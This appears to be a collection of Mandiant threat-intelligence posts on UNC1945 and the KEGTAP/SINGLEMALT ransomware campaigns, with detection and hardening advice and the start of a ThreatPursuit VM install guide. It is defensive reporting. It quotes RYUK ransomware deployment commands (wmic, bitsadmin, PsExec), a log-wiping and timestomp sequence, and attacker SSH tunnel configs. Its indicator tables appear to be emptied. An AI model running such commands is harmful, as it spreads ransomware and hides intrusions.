UNC1945 obtained and maintained access to their external infrastructure using an SSH Port Forwarding mechanism despite the host lacking accessibility to the internet directly. SSH Port Forwarding is a mechanism implemented in SSH protocol for transporting arbitrary networking data over an encrypted SSH connection (tunneling). This feature can be used for adding encryption to legacy applications traversing firewalls or with malicious intent to access internal networks from the the internet. The UNC1945 configurations we observed are similarly structured with respect to the host alias, specified options, and option order (see Figure 3).

config1 config2
Host <redacted>
HostName <redacted>
Port 900
User <redacted>
IdentityFile <redacted>
KbdInteractiveAuthentication no
PasswordAuthentication no
NoHostAuthenticationForLocalhost yes
StrictHostKeyChecking no
UserKnownHostsFile /dev/null
RemoteForward 33002
Host <redacted>
HostName <redacted>
Port 443
User <redacted>
IdentityFile <redacted>
KbdInteractiveAuthentication no
PasswordAuthentication no
NoHostAuthenticationForLocalhost yes
StrictHostKeyChecking no
UserKnownHostsFile /dev/null
ServerAliveInterval 30
ServerAliveCountMax 3
RemoteForward 2224 <redacted>:22

Figure 3: SSH config files used by UNC1945 at different incidents

As part of this multi-stage operation, UNC1945 dropped a custom QEMU Virtual Machine (VM) on multiple hosts, which was executed inside of any Linux system by launching a ‘’ script. The script contained TCP forwarding settings that could be used by the threat actor in conjunction with the SSH tunnels to give direct access from the threat actor VM to the command and control server to obfuscate interaction with customer infrastructure. The VM was running a version of the Tiny Core Linux OS with pre-loaded scripts and tools. Also, we analyzed the Virtual Machine file system timestamps, which coincided with UNC1945's overall operational timeline.

The VM contained numerous tools such as network scanners, exploits and reconnaissance tools. Tiny Core Linux pre-loaded tools included Mimikatz, Powersploit, Responder, Procdump, CrackMapExec, PoshC2, Medusa, JBoss Vulnerability Scanner and more.

Efforts to decrease operational visibility included placing tool and output files within temporary file system mount points that were stored in volatile memory. Additionally, UNC1945 used built-in utilities and public tools to modify timestamps and selectively manipulate Unix log files.

UNC1945 employed anti-forensics techniques with the use of a custom ELF utility named LOGBLEACH. The actor used built-in Linux commands to alter the timestamps of files and directories and used LOGBLEACH to clean logs to thwart forensic analysis, as seen in Figure 4.

$ ./b -C -y -a
$ mv b /usr/lib64/
$ cd /usr/lib64/
$ touch -acm -r
$ touch -acm -r


To further obfuscate activity, a Linux ELF packer named STEELCORGI was executed in memory on the Solaris system. The malware contains various anti-analysis techniques, including anti-debugging, anti-tracing, and string obfuscation. It uses environment variables as a key to unpack the final payload.

Escalate Privileges and Lateral Movement

After successfully establishing a foothold, UNC1945 collected credentials, escalated privileges, and successfully moved laterally through multiple networks.

UNC1945 obtained credentials via SLAPSTICK and open source tools such as Mimikatz, which enabled easy lateral movement throughout networks to obtain immediate access to other segments of the network and third-party environments. Stolen credentials collected by SLAPSTICK were used to traverse the customer network via SSH and deploy SLAPSTICK to additional hosts. After successfully authenticating, SLAPSTICK displays a welcome message, as seen in Figure 5.

Figure 5: SLAPSTICK backdoor welcome banner

UNC1945 used ProxyChains to download PUPYRAT, an open source, cross-platform multi-functional remote administration and post-exploitation tool mainly written in Python.

At one target, the threat actor used a virtual machine to initiate a brute-force of SSH targeting Linux and HP-UX endpoints. Beginning with seemingly random usernames and shifting to legitimate Linux and Windows accounts, the threat actor successfully established SSH connections on a Linux endpoint. After successfully escalating privileges on an HP-UX endpoint and a Linux endpoint, UNC1945 installed three backdoors: SLAPSTICK, TINYSHELL, and OKSOLO.

We observed UNC1945 use IMPACKET with SMBEXEC in a Microsoft Windows environment to execute commands remotely without the need to upload a payload to the target. SMBEXEC allows the threat actor to operate like PsExec, but without using RemComSvc. There are two main modes of using this tool that benefits attackers. Share mode allows the specification of a share that everything will be executed through. Server mode permits the output of the executed commands to be sent back by the target machine into a locally shared folder.

At one victim, we observed UNC1945 moving laterally via Remote Desktop Protocol (RDP) to a Windows server before viewing the Server Manager Panel, viewing and modifying RDP-related system firewall rules and checking the application settings of two endpoint security services.

Internal Reconnaissance

Mandiant investigations found that the threat actor maintains various tools to interact with victim networks. In addition to custom tools, the UNC1945 VMs contained various tools (e.g. network scanners, exploits and reconnaissance; see Associated Tools and Malware section).

In some intrusions, UNC1945 employed a SPARC executable identified as a reconnaissance tool. Based on publicly available information, this executable could be referred to as Luckscan or BlueKeep, the latter of which is part of the BKScan toolkit (see Figure 6).

Figure 6: SPARC executable recon tool command line used by the threat actor

According to open sources, BlueKeep, aka “bkscan” scanner, works both unauthenticated and authenticated (i.e. when Network Level Authentication is enabled). BlueKeep (CVE-2019-0708) is a security vulnerability that was discovered in Microsoft's Remote Desktop Protocol (RDP) implementation, which allows for the possibility of remote code execution.

Complete Mission

Despite this multi-staged operation, Mandiant did not observe evidence of data exfiltration and was unable to determine UNC1945's mission for most of the intrusions we investigated. In at least one case, we observed ROLLCOAST ransomware deployment in the final phase of the threat actor activity, but Mandiant didn’t attribute this activity to UNC1945. At this time, it is likely that access to the victim environment was sold to another group.


The ease and breadth of exploitation in which UNC1945 conducted this campaign suggests a sophisticated, persistent actor comfortable exploiting various operating systems, and access to resources and numerous toolsets. Given the aforementioned factors, use of zero-day exploits and virtual machines, and ability to traverse multiple third-party networks, Mandiant expects this motivated threat actor to continue targeted operations against key industries while taking advantage of operating systems that likely have inadequate security visibility.     

Associated Tools and Malware Families

EVILSUN is a remote exploitation tool that gains access to Solaris 10 and 11 systems of SPARC or i386 architecture using a vulnerability (CVE-2020-14871) exposed by SSH keyboard-interactive authentication. The remote exploitation tool makes SSH connections to hosts passed on the command line. The default port is the normal SSH port (22), but this may be overridden. EVILSUN passes the banner string SSH-2.0-Sun_SSH_1.1.3 over the connection in clear text as part of handshaking.

LEMONSTICK is a Linux executable command line utility with backdoor capabilities. The backdoor can execute files, transfer files, and tunnel connections. LEMONSTICK can be started in two different ways: passing the `-c` command line argument (with an optional file) and setting the ‘OCB’ environment variable. When started with the `-c` command line argument, LEMONSTICK spawns an interactive shell. When started in OCB mode, LEMONSTICK expects to read from STDIN. The STDIN data is expected to be encrypted with the blowfish algorithm. After decrypting, it dispatches commands based on the name—for example: ‘executes terminal command’, ‘connect to remote system’, ‘send & retrieve file’, ‘create socket connection’.

LOGBLEACH is an ELF utility that has a primary functionality of deleting log entries from a specified log file(s) based on a filter provided via command line. The following log files are hard coded in the malware, but additional log paths may be specified:

  • /var/run/utmp
  • /var/log/wtmp
  • /var/log/btmp
  • /var/log/lastlog
  • /var/log/faillog
  • /var/log/syslog
  • /var/log/messages
  • /var/log/secure
  • /var/log/auth.log

OKSOLO is a publicly available backdoor that binds a shell to a specified port. It can be compiled to support password authentication or dropped into a root shell.

OPENSHACKLE is a reconnaissance tool that collects information about logged-on users and saves it to a file. OPENSHACKLE registers Windows Event Manager callback to achieve persistence.

ProxyChains allows the use of SSH, TELNET, VNC, FTP and any other internet application from behind HTTP (HTTPS) and SOCKS (4/5) proxy servers. This "proxifier" provides proxy server support to any application.

PUPYRAT (aka Pupy) is an open source, multi-platform (Windows, Linux, OSX, Android), multi-function RAT (Remote Administration Tool) and post-exploitation tool mainly written in Python. It features an all-in-memory execution guideline and leaves very low footprint. It can communicate using various transports, migrate into processes (reflective injection), and load remote Python code, Python packages and Python C-extensions from memory.

STEELCORGI is a packer for Linux ELF programs that uses key material from the executing environment to decrypt the payload. When first starting up, the malware expects to find up to four environment variables that contain numeric values. The malware uses the environment variable values as a key to decrypt additional data to be executed.

SLAPSTICK is a Solaris PAM backdoor that grants a user access to the system with a secret, hard-coded password.

TINYSHELL is a lightweight client/server clone of the standard remote shell tools (rlogin, telnet, ssh, etc.), which can act as a backdoor and provide remote shell execution as well as file transfers.


  • FE_APT_Trojan_Linux_STEELCORGI_1
  • FE_APT_Trojan_Linux_STEELCORGI_2
  • FE_HackTool_Linux64_EVILSUN_1
  • FE_HackTool_Linux_EVILSUN_1
  • HackTool.Linux.EVILSUN.MVX
  • HXIOC UUID: e489ce60-f315-4d1a-a888-77782f687eec
  • EVILSUN (FAMILY) 90005075FE_Trojan_Linux_LEMONSTICK_1
  • HXIOC UUID: 4a56fb0c-6134-4450-ad91-0f622a92701c
  • FE_APT_Backdoor_Linux64_SLAPSTICK_1
  • FE_APT_Backdoor_Linux_SLAPSTICK_1
  • FE_Backdoor_Win_PUPYRAT_1
  • FE_Ransomware_Win64_ROLLCOAST_1
  • FE_Ransomware_Win_ROLLCOAST_1
  • HXIOC, 45632ca0-a20b-487f-841c-c74ca042e75a; ROLLCOAST RANSOMWARE (FAMILY)
  • Ransomware.Win.ROLLCOAST.MVX


  • d5b9a1845152d8ad2b91af044ff16d0b (SLAPSTICK)
  • 0845835e18a3ed4057498250d30a11b1 (STEELCORGI)
  • 6983f7001de10f4d19fc2d794c3eb534
  • 2eff2273d423a7ae6c68e3ddd96604bc
  • d505533ae75f89f98554765aaf2a330a
  • abaf1d04982449e0f7ee8a34577fe8af



ATT&CK Tactic Category


Initial Access

T1133 External Remote Services

T1190 Exploit Public-Facing Application


T1059 Command and Scripting Interpreter

T1059.001 PowerShell

T1064 Scripting


T1133 External Remote Services

Lateral Movement

T1021.001 Remote Desktop Protocol

T1021.004 SSH

Defense Evasion

T1027 Obfuscated Files or Information

T1070.004 File Deletion

T1070.006 Timestomp

T1064 Scripting

T1553.002 Code Signing


T1046 Network Service Scanning

T1082 System Information Discovery

T1518.001 Security Software Discovery

Lateral Movement

T1021.001 Remote Desktop Protocol

T1021.004 SSH

Command and Control

T1071 Application Layer Protocol

T1090 Proxy

T1105 Ingress Tool Transfer

T1132.001 Standard Encoding

For more information, check out our Bring Your Own Land blog post. Additionally, Mandiant experts from the FLARE team will present an in-depth view into UNC1945 on Thursday, Nov. 12. Register today to reserve your spot for this discussion, where the presenters from FLARE and Mandiant Managed Defense will also answer questions from the audience. Finally, for more intelligence on these types of threats, please register for Mandiant Advantage Free, a no-cost version of our threat intelligence platform.

Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser

Throughout 2020, ransomware activity has become increasingly prolific, relying on an ecosystem of distinct but co-enabling operations to gain access to targets of interest before conducting extortion. Mandiant Threat Intelligence has tracked several loader and backdoor campaigns that lead to the post-compromise deployment of ransomware, sometimes within 24 hours of initial compromise. Effective and fast detection of these campaigns is key to mitigating this threat.

The malware families enabling these attacks previously reported by Mandiant to intelligence subscribers include KEGTAP/BEERBOT, SINGLEMALT/STILLBOT and WINEKEY/CORKBOT. While these malware families communicate with the same command and control infrastructure (C2) and are close to functional parity, there are minimal code overlaps across them. Other security researchers have tracked these malware families under the names BazarLoader and BazarBackdoor or Team9.

The operators conducting these campaigns have actively targeted hospitals, retirement communities, and medical centers, even in the midst of a global health crisis, demonstrating a clear disregard for human life.

Email Campaign TTPs

Campaigns distributing KEGTAP, SINGLEMALT and WINEKEY have been sent to individuals at organizations across a broad range of industries and geographies using a series of shifting delivery tactics, techniques and procedures (TTPs). Despite the frequent changes seen across these campaigns, the following has remained consistent across recent activity:

  • Emails contain an in-line link to an actor-controlled Google Docs document, typically a PDF file.
  • This document contains an in-line link to a URL hosting a malware payload.
  • Emails masquerade as generic corporate communications, including follow-ups about documents and phone calls or emails crafted to appear related to complaints, terminations, bonuses, contracts, working schedules, surveys or queries about business hours.
  • Some email communications have included the recipient’s name or employer name in the subject line and/or email body.

Despite this uniformity, the associated TTPs have otherwise changed regularly—both between campaigns and across multiple spam runs seen in the same day. Notable ways that these campaigns have varied over time include:

  • Early campaigns were delivered via Sendgrid and included in-line links to Sendgrid URLs that would redirect users to attacker-created Google documents. In contrast, recent campaigns have been delivered via attacker-controlled or compromised email infrastructure and have commonly contained in-line links to attacker-created Google documents, although they have also used links associated with the Constant Contact service.
  • The documents loaded by these in-line links are crafted to appear somewhat relevant to the theme of the email campaign and contain additional links along with instructions directing users to click on them. When clicked, these links download malware binaries with file names masquerading as document files. Across earlier campaigns these malware binaries were hosted on compromised infrastructure, however, the attackers have shifted to hosting their malware on legitimate web services, including Google Drive, Basecamp, Slack, Trello, Yougile, and JetBrains.
  • In recent campaigns, the malware payloads have been hosted on numerous URLs associated with one or more of these legitimate services. In cases where the payloads have been taken down, the actors have sometimes updated their Google documents to contain new, working links.
  • Some campaigns have also incorporated customization, including emails with internal references to the recipients’ organizations (Figure 1) and organizations’ logos embedded into the Google Docs documents (Figure 2).

Figure 1: Email containing internal references to target an organization’s name

Figure 2: Google Docs PDF document containing a target organization’s logo

Hiding the final payload behind multiple links is a simple yet effective way to bypass some email filtering technologies. Various technologies have the ability to follow links in an email to try to identify malware or malicious domains; however, the number of links followed can vary. Additionally, embedding links within a PDF document further makes automated detection and link-following difficult.

Post-Compromise TTPs

Given the possibility that accesses obtained from these campaigns may be provided to various operators to monetize, the latter-stage TTPs, including ransomware family deployed, may vary across intrusions. A notable majority of cases where Mandiant has had visibility into these post-compromise TTPs have been attributable to UNC1878, a financially motivated actor that monetizes network access via the deployment of RYUK ransomware.

Establish Foothold

Once the loader and backdoor have been executed on the initial victim host, the actors have used this initial backdoor to download POWERTRICK and/or Cobalt Strike BEACON payloads to establish a foothold. Notably, the respective loader and backdoor as well as POWERTRICK have typically been installed on a small number of hosts in observed incidents, suggesting these payloads may be reserved for establishing a foothold and performing initial network and host reconnaissance. However, BEACON is frequently found on a larger number of hosts and used throughout various stages of the attack lifecycle.

Maintain Presence

Beyond the preliminary phases of each intrusion, we have seen variations in how these attackers have maintained presence after establishing an initial foothold or moving laterally within a network. In addition to the use of common post-exploitation frameworks such as Cobalt Strike, Metasploit and EMPIRE, we have observed the use of other backdoors, including ANCHOR, that we also believe to be under control of the actors behind TrickBot.

  • The loaders associated with this activity can maintain persistence through reboot by using at least four different techniques, including creating a scheduled task, adding itself to the startup folder as a shortcut, creating a scheduled Microsoft BITS job using /setnotifycmdline, and adding itself to the Userinit value under the following registry key:
    • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.
  • Actors have downloaded POWERTRICK, Metasploit Meterpreter, and Cobalt Strike BEACON payloads following the initial compromise. BEACON payloads have commonly been executed after moving laterally to new hosts within the victim network. The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. Notably, BEACON is the backdoor observed most frequently across these incidents.
  • We have observed actors executing encoded PowerShell commands that ultimately executed instances of the PowerShell EMPIRE backdoor.
  • The actors were observed using BEACON to execute PowerLurk's Register-MaliciousWmiEvent cmdlet to register WMI events used to kill processes related to security tools and utilities, including Task Manager, WireShark, TCPView, ProcDump, Process Explorer, Process Monitor, NetStat, PSLoggedOn, LogonSessions, Process Hacker, Autoruns, AutorunsSC, RegEdit, and RegShot.
  • In at least once case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication.

Escalate Privileges

The most commonly observed methods for escalating privileges in these incidents have involved the use of valid credentials. The actors used a variety of techniques for accessing credentials stored in memory or on disk to access privileged accounts. 

  • The actors used valid credentials obtained using MimiKatz variants to escalate privileges. We’ve observed Mimikatz being executed both from the file system of victim hosts and via PowerShell cmdlets executed via Cobalt Strike BEACON.
  • Actors have gained access to credentials via exported copies of the ntds.dit Active Directory database and SYSTEM and SECURITY registry hives from a Domain Controller. 
  • In multiple instances, the actors have launched attacks against Kerberos, including the use of RUBEUS, the MimiKatz Kerberos module, and the Invoke-Kerberoast cmdlet.


The approaches taken to perform host and network reconnaissance across these incidents varied; however, a significant portion of observed reconnaissance activity has revolved around Activity Directory enumeration using publicly available utilities such as BLOODHOUND, SHARPHOUND or ADFind, as well as the execution of PowerShell cmdlets using Cobalt Strike BEACON.

  • BEACON has been installed on a large number of systems across these intrusions and has been used to execute various reconnaissance commands including both built-in host commands and PowerShell cmdlets. Observed PowerShell cmdlets include:
    • Get-GPPPassword
    • Invoke-AllChecks
    • Invoke-BloodHound
    • Invoke-EternalBlue
    • Invoke-FileFinder
    • Invoke-HostRecon
    • Invoke-Inveigh
    • Invoke-Kerberoast
    • Invoke-LoginPrompt
    • Invoke-mimikittenz
    • Invoke-ShareFinder
    • Invoke-UserHunter
  • Mandiant has observed actors using POWERTRICK to execute built-in system commands on the initial victim host, including ipconfigfindstr, and cmd.exe.
  • The actors leveraged publicly available utilities Adfind, BLOODHOUND, SHARPHOUND, and KERBRUTE on victim networks to collect Active Directory information and credentials.
  • WMIC commands have been used to perform host reconnaissance, including listing installed software, listing running processes, and identifying operating system and system architecture.
  • The actors have used a batch script to ping all servers identified during Active Directory enumeration and output the results to res.txt
  • The actors used the Nltest command to list domain controllers.

Lateral Movement

Lateral movement was most commonly accomplished using valid credentials in combination with Cobalt Strike BEACON, RDP and SMB, or using the same backdoors used to establish a foothold in victim networks.

  • The actors have regularly leveraged Cobalt Strike BEACON and Metasploit Meterpreter to move laterally within victim environments. 
  • The actors commonly moved laterally within victim environments using compromised accounts—both those belonging to regular users and accounts with administrative privileges. In addition to the use of common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP and SMB protocols. 
  • The actors used the Windows net use command to connect to Windows admin shares to move laterally.

Complete Mission

Mandiant is directly aware of incidents involving KEGTAP that included the post-compromise deployment of RYUK ransomware. We have also observed instances where ANCHOR infections, another backdoor associated with the same actors, preceded CONTI or MAZE deployment.

  • In at least one case, an executable was observed that was designed to exfiltrate files via SFTP to an attacker-controlled server.
  • The actors have used Cobalt Strike BEACON to exfiltrate data created through network reconnaissance activities as well as user files.
  • The actors were observed deleting their tools from victim hosts in an attempt to remove indicators of compromise.
  • The actors have used their access to the victim network to deploy ransomware payloads. There is evidence to suggest that RYUK ransomware was likely deployed via PsExec, but other scripts or artifacts related to the distribution process were not available for forensic analysis.

Hunting Strategies

If an organization identifies a host with an active infection believed to be an instance of KEGTAP or a parallel malware family, the following containment actions are recommended. Note that due to the velocity of this intrusion activity, these actions should be taken in parallel.

  • Isolate and perform a forensic review of any impacted systems.
  • Review incoming emails to the user that owns the impacted device for emails matching the distribution campaigns, and take action to remove the messages from all mailboxes.
  • Identify the URLs used by the phishing campaign and block them using proxy or network security devices.
  • Reset credentials for any user accounts associated with execution of the malware.
  • Perform an enterprise wide review for lateral movement authentication from the impacted systems.
  • Check authentication logs from any single-factor remote access solutions that may exist (VPN, VDI, etc) and move towards multi-factor authentication (MFA) as soon as possible.

An enterprise-wide effort should be made to identify host-based artifacts related to the execution of first-stage malware and all post-intrusion activity associated with this activity. Some baseline approaches to this have been captured as follows.

Activity associated with the KEGTAP loader can often be identified via a review of system startup folders and Userinit values under the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon registry key.

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\adobe.lnk

Figure 3: Example LNK file associated with KEGTAP persistence within a system’s startup folders

SINGLEMALT employs BITS to maintain persistence through reboot and can often be identified via a review of anomalous BITS jobs. SINGLEMALT uses a well-documented BITS persistence mechanism that intentionally creates a job to download a non-existent URL, which will trigger a failure event. The job is set to retry on a regular interval, thus ensuring the malware continues to run. To review the BITS job on a host run the command bitsadmin /list.

  • Display name may be “Adobe Update”, “System autoupdate” or another generic value.
  • Notify state may be set to Fail (Status 2).
  • FileList URL value may be set to the local host or a URL that does not exist.
  • The Notification Command Line value may contain the path to the SINGLEMALT sample and/or a command to move it to a new location then start it.
  • The Retry Delay value will be set.

WINEKEY maintains persistence through reboot via the use of registry RUN keys. Searching for anomalous RUN keys enterprise-wide can help to identify systems impacted by this malware.

Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Backup Mgr

Value: Path to the backdoor

Figure 4: Example registry RUN key used by WINEKEY to maintain persistence

The ANCHOR backdoor has been seen across a subset of intrusions associated with this activity and can often be identified via the scheduled tasks it uses to maintain persistence through reboot. The scheduled tasks created by ANCHOR are often unnamed, although that is not always the case.

  • The identification of named scheduled tasks associated with ANCHOR persistence may be constructed according to the following pattern: <Random directory within %APPDATA%> autoupdate#<random number>.
  • All unnamed scheduled tasks should be reviewed, particularly those with a creation date consistent with the time of the suspected compromise.

Although it is a low fidelity indicator, ANCHOR activity may also sometimes be identified by searching for binaries within the C:\Windows\SysWOW64 directory that have a file name matching the following pattern: <8 random lowercase chars>.exe. Stacking or sorting on file creation timestamps in the C:\Windows\SysWOW64 directory may also help identify malicious files, as the directory should be mostly static.

Post-exploitation activity associated with the deployment of ransomware following these campaigns is typically conducted using the Cobalt Strike attack framework. The BEACON payload associated with Cobalt Strike can often be identified via a review of existing registered services and service creation events (Event ID 7045), both markers of the mechanism it most commonly employs to maintain persistence.

The following are additional strategies that may aid in identifying associated activity:

  • Organizations can review web proxy logs in order to identify HXXP requests for file storage, project management, collaboration or communication services with a referrer from a Google Docs document.
  • During the associated post-compromise activity, attackers have commonly staged their tools and data in the PerfLogs directory and C$ share.
  • While collecting data used to enable later-stage operations, the attackers commonly leave instances of ntds.dit and exports of the SYSTEM and SECURITY registry hives on impacted systems.

Hardening Strategies

The actions taken by the actors to escalate privileges and move laterally in an environment use well-documented techniques that search the network and Active Directory for common misconfigurations that expose credentials and systems for abuse. Organizations can take steps to limit the impact and effectiveness of these techniques. For more in-depth recommendations see our ransomware protection white paper.

  • Harden service accounts against brute force and password guessing attacks. Most organizations have at least a few service accounts with passwords set to never expire. These passwords are likely old and insecure. Make a best effort to reset as many of these accounts as possible to long and complex passwords. In cases where it is possible, migrate to MSAs and gMSAS for automated rotation.
  • Prevent the usage of privileged accounts for lateral movement. Use GPOs to restrict the ability for privileged accounts such as Domain Administrators and privileged service accounts from initiating RDP connections and network logins.Actors often pick just a few accounts to use for RDP; by limiting the number of potential accounts, you provide detection opportunities and opportunities to slow the actor.
  • Block internet access for servers where possible. Often times there is no business need for servers, especially AD infrastructure systems, to access the Internet. The actors often choose high-uptime servers for the deployment of post-exploitation tools such as BEACON.
  • Block uncategorized and newly registered domains using web proxies or DNS filters. Often the final payload delivered via phishing is hosted on a compromised third-party website that do not have a business categorization.
  • Ensure that critical patches are installed on Windows systems as well as network infrastructure. We have observed attackers exploiting well-known vulnerabilities such as Zerologon (CVE-2020-1472) to escalate privileges in an environment prior to deploying ransomware. In other cases, possibly unrelated to UNC1878, we have observed threat actors gain access to an environment through vulnerable VPN infrastructure before deploying ransomware.

For more intelligence on ransomware and other threats, please register for Mandiant Advantage Free, a no-cost version of our threat intelligence platform. Check out this episode of State of the Hack for additional information on this threat.

Campaign Indicators

Sample Email Subjects / Patterns

  • <(first|last)-name>: Important Information
  • <Company Name>
  • <Company Name> complaint
  • <(first|last)-name>
  • <(first|last)-name>
  • Agreement cancellation message
  • Agreement cancellation notice
  • Agreement cancellation notification
  • Agreement cancellation reminder
  • Agreement suspension message
  • Agreement suspension notice
  • Agreement suspension notification
  • Agreement suspension reminder
  • Arrangement cancellation message
  • Arrangement cancellation notice
  • Arrangement cancellation notification
  • Arrangement cancellation reminder
  • Arrangement suspension message
  • Arrangement suspension notice
  • Arrangement suspension notification
  • Arrangement suspension reminder
  • Contract cancellation message
  • Contract cancellation notice
  • Contract cancellation notification
  • Contract cancellation reminder
  • Contract suspension message
  • Contract suspension notice
  • Contract suspension notification
  • Contract suspension reminder
  • debit confirmation
  • FW: <Name> Annual Bonus Report is Ready
  • FW: Urgent: <Company Name>: A Customer Complaint Request – Prompt Action Required
  • RE: <(first|last)-name>
  • RE: <(first|last)-name>: Your Payslip for October
  • RE: <Company Name> - my visit
  • RE: <Company Name> Employee Survey
  • RE: <Company Name> office
  • RE: <Name> about complaint
  • RE: <Name> bonus
  • RE: <Name> termination list
  • RE: <Name>
  • RE: <Company Name> office
  • RE: <(first|last)-name>
  • RE: <(first|last)-name> <(first|last)-name>: complaint
  • RE: <(first|last)-name>: Subpoena
  • RE: <(first|last)-name>
  • RE: <(first|last)-name>: Your Payslip for September
  • RE: about complaint
  • RE: Adopted Filer Forms
  • RE: Business hours adjustment
  • RE: Business hours realignment
  • RE: Business hours rearrangement
  • RE: Business hours restructuring
  • RE: Business schedule adjustment
  • RE: Business schedule realignment
  • RE: Business schedule rearrangement
  • RE: Business schedule restructuring
  • RE: call me
  • RE: changes
  • RE: complaint
  • RE: Complaint in <Company Name>.
  • RE: Complaint on <Name>
  • RE: customer request
  • RE: debit confirmation
  • RE: document copy
  • RE: documents list
  • RE: Edgar Filer forms renovations
  • RE: employee bonuses
  • RE: Filer Forms adaptations
  • RE: my call
  • RE: New filer form types
  • RE: office
  • RE: our meeting
  • RE: Payroll Register
  • RE: report confirmation
  • RE: situation
  • RE: Subpoena
  • RE: termination
  • RE: till 2 pm
  • RE: Urgent <Company Name> Employee Internal Survey
  • RE: visit
  • RE: what about your opinion?
  • RE: what time?
  • RE: why
  • RE: why this debit
  • RE: Working schedule adjustment
  • RE: Working schedule realignment
  • RE: Working schedule rearrangement
  • RE: Working schedule restructuring
  • RE: Your Payslip for September

Example Malware Family MD5s

    • df00d1192451268c31c1f8568d1ff472
    • 6c6a2bfa5846fab374b2b97e65095ec9
    • 37aa5690094cb6d638d0f13851be4246
    • 3176c4a2755ae00f4fffe079608c7b25
    • 9301564bdd572b0773f105287d8837c4
    • 0796f1c1ea0a142fc1eb7109a44c86cb

Code Signing Certificate CNs

  • Best Fud, OOO
  • BlueMarble GmbH
  • Company Megacom SP Z O O
  • Geksan LLC
  • Infinite Programming Limited
  • James LTH d.o.o.
  • Logika OOO
  • MADAS d.o.o.
  • Nordkod LLC
  • Retalit LLC
  • Rumikon LLC
  • TARAT d.o.o.
  • TES LOGISTIKA d.o.o.
  • VITA-DE d.o.o.

UNC1878 Indicators

A significant proportion of the post-compromise activity associated with these campaigns has involved the distribution of RYUK ransomware by a threat group tracked by Mandiant as UNC1878. As such, we are releasing indicators associated with this group.


First Seen













































































































































































































































































































































































































































































































































































First Seen






































































































































































































































































































































































































































































































































































































































































































































































































































































RYUK Commands

start wmic /node:@C:\share$\comps1.txt /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c bitsadmin /transfer vVv \\[REDACTED]\share$\vVv.exe %APPDATA%\vVv.exe & %APPDATA%\vVv.exe"

start PsExec.exe /accepteula @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c COPY "\\[REDACTED]\share$\vVv.exe" "C:\windows\temp\vVv.exe"

start PsExec.exe -d @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c c:\windows\temp\vVv.exe

Detecting the Techniques

FireEye detects this activity across our platforms. The following table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.


Signature Name

Endpoint Security


Network Security and Email Security

  • Downloader.Win.KEGTAP
  • Trojan.KEGTAP
  • APTFIN.Backdoor.Win.BEERBOT
  • APTFIN.Downloader.Win.SINGLEMALT
  • APTFIN.Backdoor.Win.STILLBOT
  • APTFIN.Downloader.Win.WINEKEY
  • APTFIN.Backdoor.Win.CORKBOT
  • FE_Downloader_Win64_KEGTAP
  • FE_APTFIN_Backdoor_Win32_BEERBOT
  • FE_APTFIN_Backdoor_Win_BEERBOT
  • FE_APTFIN_Downloader_Win32_SINGLEMALT
  • FE_APTFIN_Downloader_Win64_SINGLEMALT
  • FE_APTFIN_Downloader_Win_WINEKEY
  • FE_APTFIN_Backdoor_Win_CORKBOT

Welcome to ThreatPursuit VM: A Threat Intelligence and Hunting Virtual Machine

Skilled adversaries can deceive detection and often employ new measures in their tradecraft. Keeping a stringent focus on the lifecycle and evolution of adversaries allows analysts to devise new detection mechanisms and response processes. Access to the appropriate tooling and resources is critical to discover these threats within a timely and accurate manner. Therefore, we are actively compiling the most essential software packages into a Windows-based distribution: ThreatPursuit VM.

ThreatPursuit Virtual Machine (VM) is a fully customizable, open-sourced Windows-based distribution focused on threat intelligence analysis and hunting designed for intel and malware analysts as well as threat hunters to get up and running quickly. The threat intelligence analyst role is a subset and specialized member of the blue team. Individuals in this role generally have a strong impetus for knowing the threat environment. Often their traits, skills and experiences will vary depending on training and subject matter expertise.

Their expertise may not be technical and may include experiences and tradecraft earned by operating within a different domain (e.g., geospatial, criminal, signals intelligence, etc.). A key aspect of the role may include the requirement to hunt, study and triage previously undiscovered or recently emerging threats by discerning data for evil. Threat analysts apply a variety of structured analytical methods in order to develop meaningful and relevant products for their customers.

With this distribution we aim to enable users to:

  • Conduct hunting activities or missions
  • Create adversarial playbooks using evidence-based knowledge
  • Develop and apply a range of analytical products amongst datasets
  • Perform analytical pivoting across forensic artifacts and elements
  • Emulate advanced offensive security tradecraft
  • Enable situational awareness through intelligence sharing and reporting
  • Applied data science techniques & visualize clusters of symbolic data
  • Leverage open intelligence sources to provide unique insights for defense and offense

Akin to both FLARE-VM and Commando VM, ThreatPursuit VM uses Boxstarter, Chocolatey and MyGet packages to install software that facilitates the many aspects related to roles performed by analysts. The tools installed provide easy access to a broad range of tooling, including, but not limited to, threat analytics, statistics, visualisation, threat hunting, malware triage, adversarial emulation, and threat modelling. Here are some of the tools, but there are many more:

For a full list of tools, please visit our GitHub repository.


Similar to FLARE-VM and Commando VM, it's recommended to install ThreatPursuit VM in a virtual machine. The following is an overview of the minimal and recommended installation requirements.

  • Windows 10 1903 or greater
  • 60 GB Hard Drive
  • 4 GB RAM
  • Windows 10 1903
  • 80+ GB Hard Drive
  • 6+ GB RAM
  • 1 network adapter
  • OpenGL Graphics Card 1024mb
  • Enable Virtualization support for VM
    • Required for Docker (MISP, OpenCTI)
Standard Install

The easiest way to install ThreatPursuit VM is to use the following steps. This will install all the default tools and get you finding evil in no time!

  1. Create and configure a new Windows 10 VM with the aforementioned requirements.
    • Ensure VM is updated completely. You may need to check for updates, reboot and check again until no more remain.
  2. Install your specific VM guest tools (e.g., VMware Tools) to allow additional features such as copy/paste and screen resizing.
  3. Take a snapshot of your machine! This allows you to always have a clean state.
  4. Download and copy install.ps1 to your newly configured VM.
  5. Open PowerShell as an administrator.

Next, unblock the install file by running: Unblock-File .\install.ps1, as seen in Figure 1.

Figure 1: Unblock-File installation script

Enable script execution by running: Set-ExecutionPolicy Unrestricted -f , as seen in Figure 2.

